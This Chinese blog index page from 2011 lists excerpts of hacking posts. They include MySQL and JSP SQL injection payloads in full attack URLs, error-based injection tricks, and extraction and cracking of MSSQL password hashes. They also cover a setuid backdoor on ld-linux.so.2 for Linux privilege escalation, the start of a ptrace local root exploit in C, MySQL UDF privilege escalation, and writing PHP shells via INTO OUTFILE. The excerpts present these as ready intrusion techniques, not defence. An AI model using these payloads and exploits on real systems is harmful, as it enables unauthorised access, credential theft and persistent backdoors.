2011年5月2日

Mysql显错注入新方法

摘要: http://xxx.cn/qcwh/content/detail.php?id=330&sid=19&cid=261+and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c) Error:Duplicate column name ‘5.0.27-community-nt’Error:Duplicate column name ‘5.0.27-community-nt’http://xxx.cn/qcwh/cont 阅读全文

posted @ 2011-05-02 00:44 小宝哥哥 阅读(322) 评论(0) 推荐(0) 编辑

破解mysql hash 提权技巧

摘要: mssql的hash保存在表master.dbo.sysxlogins中,用select name,password from master.dbo.sysxlogins可以提取用户hash0x01004E04BE46023057E323AF27269E5B7DDCA140C98D225BDD3D06E8EFE8CFAEC02985B27B38059FA3B18349612B分解:常量部分:0×0100Salt部分:4E04BE46混合密文:023057E323AF27269E5B7DDCA140C98D225BDD3D大写字母密文:06E8EFE8CFAEC02985B27B380 阅读全文

posted @ 2011-05-02 00:42 小宝哥哥 阅读(228) 评论(0) 推荐(0) 编辑

webshell下LINUX提权+留后门

摘要: 方法一:setuid的方法,其实8是很隐蔽。看看过程:[root@localdomain lib]# ls -l |grep ld-linuxlrwxrwxrwx 1 root root 9 2008-06-07 17:32 ld-linux.so.2 -> ld-2.7.solrwxrwxrwx 1 root root 13 2008-06-07 17:47 ld-lsb.so.3 -> ld-linux.so.2[root@localdomain lib]# chmod +s ld-linux.so.2[root@localdomain lib]# ls -l |grep ld 阅读全文

posted @ 2011-05-02 00:33 小宝哥哥 阅读(2355) 评论(0) 推荐(0) 编辑

linux下用rinetd做端口转发

摘要: 端口转发映射的程序叫rinetd,启动方法rinetd -c /etc/rinetd.conf 。把1.1.1.1的11端口映射到2.2.2.2的3389端口,配置文件如下[root@localhost iso]# cat /etc/rinetd.conf1.1.1.1 11 2.2.2.1 33891.1.1.1 12 2.2.2.2 33891.1.1.1 13 2.2.2.3 221.1.1.1 14 2.2.2.4 80allow *.*.*.*logfile /var/log/rinetd.log要说iptables也能实现,但不清楚具体的命令是啥,这个链那个链的,我对iptable 阅读全文

posted @ 2011-05-02 00:32 小宝哥哥 阅读(171) 评论(0) 推荐(0) 编辑

Linux系统信息查看命令大全

摘要: 系统 # uname -a # 查看内核/操作系统/CPU信息 # head -n 1 /etc/issue # 查看操作系统版本 # cat /proc/cpuinfo # 查看CPU信息 # hostname # 查看计算机名 # lspci -tv # 列出所有PCI设备 # lsusb -tv # 列出所有USB设备 # lsmod # 列出加载的内核模块 # env # 查看环境变量 资源 # free -m # 查看内存使用量和交换区使用量 # df -h # 查看各分区使用情况 # du -sh # 查看指定目录的大小 # grep MemTotal /proc/meminfo 阅读全文

posted @ 2011-05-02 00:31 小宝哥哥 阅读(386) 评论(0) 推荐(0) 编辑

Linux l 2.4.20-8 # 溢出

摘要: 代码如下:/* by Nergal */#include <stdio.h>#include <sys/ptrace.h>#include <fcntl.h>#include <sys/ioctl.h>void ex_passwd(int fd){char z;if (read(fd, &z, 1) <= 0) {perror("read:");exit(1);}execl("/usr/bin/passwd", "passwd", 0);perror("execl 阅读全文

posted @ 2011-05-02 00:24 小宝哥哥 阅读(258) 评论(0) 推荐(0) 编辑

JSP注入

摘要: 老东西了,不过很有用大家看看。(大牛飘过)1、 判断注入类型(数字型还是字符型)字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分) http://www.asphack.com/index_kaoyan_view.jsp?id=117 And user>char(0)http://www.asphack.com/index_kaoyan_view.jsp?id=117 And user<char(0)http://www.asphack.com/index_kaoyan_view.jsp?id=117' And user>char(0) 阅读全文

posted @ 2011-05-02 00:19 小宝哥哥 阅读(295) 评论(0) 推荐(0) 编辑

Mysql注入高效率方法

摘要: 此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等http://www.xx.c 阅读全文

posted @ 2011-05-02 00:17 小宝哥哥 阅读(416) 评论(0) 推荐(0) 编辑

mysql提权提示can't open shared library 'udf.dll'解决办法

摘要: 对于can't open shared library 'udf.dll'相信很多使用mysql提权的朋友应该都不会感到陌生吧,明明是root用户 但是在使用udf.dll提权创建自定义函数时却提示这样的错误,以前遇到这种情况一般都会放弃。 经过测试发现appserv搭建php环境能利用udf.dll提权 5.037apache+php+mysql+phpmyadmin搭建的php环境不能利用 5.1为什么两个系统一个能利用一个不能利用呢?原因很简单 因为 5.1版本开始必须把udf.dll文件放到mysql安装目录下的lib/blugin文件下才能创建自定义函数,并且 阅读全文

posted @ 2011-05-02 00:17 小宝哥哥 阅读(6530) 评论(0) 推荐(0) 编辑

Mysql5注射技巧总结

摘要: 查库id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*查表id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1查段id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/ 阅读全文

posted @ 2011-05-02 00:16 小宝哥哥 阅读(104) 评论(0) 推荐(0) 编辑

php+mysql快速渗透

摘要: 1)如何快速寻找站点注入漏洞?2)PHP+MYSQL数据库下快速寻找WEB站点路径? 3)MYSQL LOAD FILE()下读取文件?3)MYSQL INTO OUTFILE下写入PHPSHELL?简单介绍Mysql注入中用到的一些函数的作用,利用它们可以判断当前用户权限(Root为最高,相当于MSSQL中的SA)、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。1:system_user() 系统用户名2:user() 用户名3:current_user 当前用户名4:session_user()连接数据库的用户名5:database() 数据库名6:version() MYSQL 阅读全文

posted @ 2011-05-02 00:14 小宝哥哥 阅读(668) 评论(0) 推荐(0) 编辑

MySQL注入中报错的利用

摘要: 在很多的情况 下我们不能直接方便的进行注入,于是有了BENCHMARK延迟注射,如果能得到MySQL的错误信息的话,现在又有了更方便的方法。网上流传了两三种方法,以前我在BLOG也记录了其中一种://利用MySQL出错爆出字段mysql> SELECT * FROM (SELECT * FROM user A JOIN user B) C;ERROR 1060 (42S21): Duplicate column name 'Host'mysql> SELECT * FROM (SELECT * FROM user A JOIN user B USING (Host) 阅读全文

posted @ 2011-05-02 00:12 小宝哥哥 阅读(456) 评论(0) 推荐(0) 编辑

导航

Tasup